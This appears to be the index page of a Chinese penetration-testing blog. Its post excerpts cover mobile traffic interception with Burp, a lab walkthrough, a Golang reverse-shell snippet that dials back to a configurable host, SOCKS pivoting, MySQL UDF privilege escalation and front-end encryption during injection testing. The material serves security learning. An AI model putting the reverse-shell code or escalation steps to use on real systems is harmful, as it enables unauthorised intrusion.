微信小程序测试

小程序抓包

低版本Android系统抓包方式和正常的浏览器抓包相同,导入burp证书即可。但在Android7.0+版本即使导入证书也抓不到https包,由于系统证书信任机制原因导致,解决方法:
1、使用低版本系统;
2、夜神模拟器+Proxifier;
Btw:更换burp版本后重新导入一下对应版本的证书文件。

阅读更多

Pentestit Lab 14 Writeup/Walkthrough

Pentestit Lab 14放出来时间快一个月了,中途断断续续做了一次,因为是第一次做这个系列靶机,很多关卡难免绕弯路,部分脑洞也是感谢热心群友提醒(比如vpn关卡),在这儿从原始笔记摘出有用的信息来把过程记录下.

阅读更多

Golang Socket & ShellcodeLoader

upload successful

Windows Reverse Shell

1、net.Dial回连:

1
2
3
4
backip := flag.String("d", "127.0.0.1", "ServerIpAdddress")
backport := flag.Int("p", 1025, "ServerPort")
flag.Parse()
conn, err := net.Dial("tcp", *backip+":"+strconv.Itoa(*backport))
阅读更多

渗透测试中的Socks代理

比较常见的一种情况,处于内网的机器,只映射一个Web服务到公网,通过Webshell看到的环境其实是在内网,这类目标一般不通外网,Beacon也不会回连,此时需要代理到目标内网环境。

阅读更多

博客迁移记录

update:2019-05-13

删除live2d插件;

1
2
npm uninstall hexo-helper-live2d
hexo clean

update:2019-02-26

配置新环境:

1
2
3
4
5
git config --global user.name "yourgithubname"
git config --global user.email "yourgithubemail"
ssh-keygen -t rsa -C "youremail"
cat .ssh/xxx.pub (配置到github账户上)
ssh -T [email protected]
1
2
3
# Using Ubuntu
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
sudo apt-get install -y nodejs

注:网上教程大部分是直接用apt安装nodejs,实测在ubuntu18.04x64系统下会失败。

1
sudo npm install hexo-cli -g

博客备份目录下执行:npm install

温故——MySQL数据库UDF提权

update:2019-05-13

遇到一个案例,在内网扫描到MySQL弱口令(root账户),连接数据库后将beacon以16进制的形式写入到指定目录(目录可通过sqlmap os-shell获得),可在本地MySQL执行:

阅读更多

渗透测试中如何处理前端加密?

在渗透测试过程中难免会遇到很多参数前端加密处理的情况,对我们接下来Fuzz、爆破/注入等操作引入很多麻烦,结合之前遇到的几种场景,整理总结了以下解决方法,常见场景如:
1、遇到一个SQL注入,但是注入参数被魔改base64了,我们需要写tamper处理payload,如何高效处理?
2、请求带一个防重放攻击的校验hash,该hash是开发者自定义加密算法生成的,如何分析并达到批量目的?
3、…

阅读更多